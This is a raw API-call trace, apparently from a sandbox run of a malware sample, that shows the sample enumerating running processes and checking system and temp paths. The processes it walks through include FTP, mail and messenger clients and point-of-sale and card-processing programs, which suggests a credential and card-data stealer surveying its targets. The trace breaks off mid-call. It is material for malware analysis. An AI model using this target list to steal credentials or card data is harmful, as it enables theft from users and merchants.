GetCurrentProcessId () returned 0xde0 [0097.177] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="containhowever.exe")) returned 1 [0097.178] GetCurrentProcessId () returned 0xde0 [0097.178] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="amount-bad.exe")) returned 1 [0097.179] GetCurrentProcessId () returned 0xde0 [0097.179] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="various.exe")) returned 1 [0097.179] GetCurrentProcessId () returned 0xde0 [0097.179] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="military.exe")) returned 1 [0097.180] GetCurrentProcessId () returned 0xde0 [0097.180] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="coach_wait_small.exe")) returned 1 [0097.181] GetCurrentProcessId () returned 0xde0 [0097.181] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pressure_former.exe")) returned 1 [0097.182] GetCurrentProcessId () returned 0xde0 [0097.182] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="project.exe")) returned 1 [0097.182] GetCurrentProcessId () returned 0xde0 [0097.182] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="body.exe")) returned 1 [0097.183] GetCurrentProcessId () returned 0xde0 [0097.184] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="though.exe")) returned 1 [0097.184] GetCurrentProcessId () returned 0xde0 [0097.184] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0097.216] GetCurrentProcessId () returned 0xde0 [0097.216] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0097.217] GetCurrentProcessId () returned 0xde0 [0097.217] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0097.218] GetCurrentProcessId () returned 0xde0 [0097.218] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0097.219] GetCurrentProcessId () returned 0xde0 [0097.219] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0097.220] GetCurrentProcessId () returned 0xde0 [0097.220] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0097.221] GetCurrentProcessId () returned 0xde0 [0097.221] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0097.222] GetCurrentProcessId () returned 0xde0 [0097.222] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0097.223] GetCurrentProcessId () returned 0xde0 [0097.223] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0097.223] GetCurrentProcessId () returned 0xde0 [0097.223] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0097.224] GetCurrentProcessId () returned 0xde0 [0097.224] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xed0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0097.225] GetCurrentProcessId () returned 0xde0 [0097.225] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0097.226] GetCurrentProcessId () returned 0xde0 [0097.226] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0097.227] GetCurrentProcessId () returned 0xde0 [0097.227] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0097.228] GetCurrentProcessId () returned 0xde0 [0097.228] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0097.229] GetCurrentProcessId () returned 0xde0 [0097.229] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0097.230] GetCurrentProcessId () returned 0xde0 [0097.230] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0097.231] GetCurrentProcessId () returned 0xde0 [0097.231] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0097.232] GetCurrentProcessId () returned 0xde0 [0097.232] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0097.233] GetCurrentProcessId () returned 0xde0 [0097.233] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0097.233] GetCurrentProcessId () returned 0xde0 [0097.234] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0097.234] GetCurrentProcessId () returned 0xde0 [0097.234] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0097.235] GetCurrentProcessId () returned 0xde0 [0097.235] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0097.236] GetCurrentProcessId () returned 0xde0 [0097.236] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0097.237] GetCurrentProcessId () returned 0xde0 [0097.237] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0097.237] GetCurrentProcessId () returned 0xde0 [0097.237] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0097.238] GetCurrentProcessId () returned 0xde0 [0097.238] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0097.239] GetCurrentProcessId () returned 0xde0 [0097.239] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0097.240] GetCurrentProcessId () returned 0xde0 [0097.240] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0097.241] GetCurrentProcessId () returned 0xde0 [0097.241] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0097.242] GetCurrentProcessId () returned 0xde0 [0097.242] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0097.243] GetCurrentProcessId () returned 0xde0 [0097.243] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0097.243] GetCurrentProcessId () returned 0xde0 [0097.244] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0097.244] GetCurrentProcessId () returned 0xde0 [0097.244] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0097.245] GetCurrentProcessId () returned 0xde0 [0097.245] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0097.246] GetCurrentProcessId () returned 0xde0 [0097.246] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0097.247] GetCurrentProcessId () returned 0xde0 [0097.247] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0097.248] GetCurrentProcessId () returned 0xde0 [0097.248] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0097.249] GetCurrentProcessId () returned 0xde0 [0097.249] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0097.250] GetCurrentProcessId () returned 0xde0 [0097.250] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0097.251] GetCurrentProcessId () returned 0xde0 [0097.251] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0097.252] GetCurrentProcessId () returned 0xde0 [0097.252] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0097.252] GetCurrentProcessId () returned 0xde0 [0097.252] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0097.253] GetCurrentProcessId () returned 0xde0 [0097.253] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1050, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="answerelectionthroughout.exe")) returned 1 [0097.254] GetCurrentProcessId () returned 0xde0 [0097.254] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x66c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.254] GetCurrentProcessId () returned 0xde0 [0097.254] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.255] GetCurrentProcessId () returned 0xde0 [0097.255] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x12dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0097.256] GetCurrentProcessId () returned 0xde0 [0097.256] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x12ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0097.256] GetCurrentProcessId () returned 0xde0 [0097.256] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x13a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.257] GetCurrentProcessId () returned 0xde0 [0097.257] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x13fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x38c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0097.257] GetCurrentProcessId () returned 0xde0 [0097.258] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0097.258] GetCurrentProcessId () returned 0xde0 [0097.258] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb54, pcPriClassBase=8, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0097.259] GetCurrentProcessId () returned 0xde0 [0097.260] CloseHandle (hObject=0x1f0) returned 1 [0097.260] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xb54) returned 0x0 [0097.261] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xce160 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0097.272] lstrlenW (lpString="C:\\Windows\\system32") returned 19 [0097.273] StrCmpNIW (lpStr1="C:\\Windows\\system32", lpStr2="C:\\Windows\\system32", nChar=19) returned 0 [0097.278] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0xce160 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0097.278] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 37 [0097.278] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0097.278] StrCmpNIW (lpStr1="", lpStr2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", nChar=36) returned -1 [0097.279] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fc [0097.286] Process32FirstW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.287] GetCurrentProcessId () returned 0xde0 [0097.287] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x75, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.288] GetCurrentProcessId () returned 0xde0 [0097.288] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.289] GetCurrentProcessId () returned 0xde0 [0097.289] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.289] GetCurrentProcessId () returned 0xde0 [0097.289] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.290] GetCurrentProcessId () returned 0xde0 [0097.290] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.291] GetCurrentProcessId () returned 0xde0 [0097.291] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.292] GetCurrentProcessId () returned 0xde0 [0097.292] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.293] GetCurrentProcessId () returned 0xde0 [0097.293] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.294] GetCurrentProcessId () returned 0xde0 [0097.294] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: 